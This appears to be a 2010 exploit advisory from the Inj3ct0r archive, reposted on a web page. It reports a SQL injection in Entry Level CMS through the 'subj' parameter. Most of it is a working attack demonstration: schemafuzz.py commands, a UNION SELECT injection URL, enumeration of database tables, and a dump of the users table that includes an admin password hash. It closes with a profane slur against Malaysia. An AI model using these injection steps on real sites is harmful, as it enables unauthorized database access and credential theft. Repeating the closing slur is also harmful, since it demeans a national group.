Home / os / win7

Entry Level CMS SQL Injection Vulnerability

Posted on 20 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Entry Level CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== Entry Level CMS SQL Injection Vulnerability =========================================== [+]Title : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py --==[ Author ]==-- [+] Author : [+] vir0e5 (NEWBIE) [+] Contact : vir0e5[at]hackermail[dot]com [+] Group : TECON (The Eye COnference) Indonesia [+] Site : http://tecon-crew.org ******************************************** [Software Information ] [+]SOftware : Entry Level Content Management System (EL CMS) [+]vendor : http://www.entrylevelcms.com/ [+]Vulnerability : SQL Injection ******************************************** [ Vulnerable File ] http://localhost/website/index.php?subj=4 [demo with schemafuzz.py] |--------------------------------------------------------------- | rsauron[at]gmail[dot]com v5.0 | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table &amp; Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ C:Python26exploitschemafuzz&gt;schemafuzz.py -u &quot;http://localhost/website/index.php?subj=6&quot; --findcol |------------------------------------------------------------ | rsauron[at]gmail[dot]com v5.0 | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table &amp; Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=6-- [+] Evasion Used: &quot;+&quot; &quot;--&quot; [+] 03:36:40 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2,3, [+] Column Length is: 4 [+] Found null column at column #: 0 [+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3-- [+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3 [-] Done! C:Python26exploitschemafuzz&gt;schemafuzz.py -u &quot;http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3&quot; --full |------------------------------------------------------------ | rsauron[at]gmail[dot]com v5.0 | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table &amp; Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3-- [+] Evasion Used: &quot;+&quot; &quot;--&quot; [+] 05:33:34 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [Database]: elcms_db [Table: Columns] [0]pages: id,subject_id,menu_name,position,visible,content [1]subjects: id,menu_name,position,visible [2]users: id,username,hashed_password [-] [05:55:27] [-] Total URL Requests 17 [-] Done C:Python26schemafuzz&gt;schemafuzz.py -u &quot;http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3&quot; --dump -D elcms_db -T users -C id,username,hashed_password |------------------------------------------------------------ | rsauron[at]gmail[dot]com v5.0 | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table &amp; Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3-- [+] Evasion Used: &quot;+&quot; &quot;--&quot; [+] 05:35:14 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [+] Dumping data from database &quot;vman&quot; Table &quot;users&quot; [+] Column(s) ['id', 'username', 'hashed_password'] [+] Number of Rows: 1 [0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8: [-] [05:35:15] [-] Total URL Requests 3 [-] Done If you not understand about it [Option/help this tools] schemafuzz.py -h ******************************************** -- Thank's to my GOD and Soldier Of Allah -- Special Thanks #http://indonesian-cyber.org (as Member) #http://indonesianhacker.org (as Member) #http://devilzc0de.org (as Member) #http://tecon-crew.org (as Member) #http://u3dcrew.darkbb.com (as Member) --No Special for me, i'm newbie!! ^^-- kaMtiEz, r3m1ck, mywisdom, kiddies, dewancc, m0z4rtkl1k, bluescreen, xyberdesktop, n0rma4n_gokil, 12i4n, BZ AND YOU!!! Notice : &quot;boycott malaysian product &quot; * Fuck to Malaysia &lt;= the truly thief asia # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP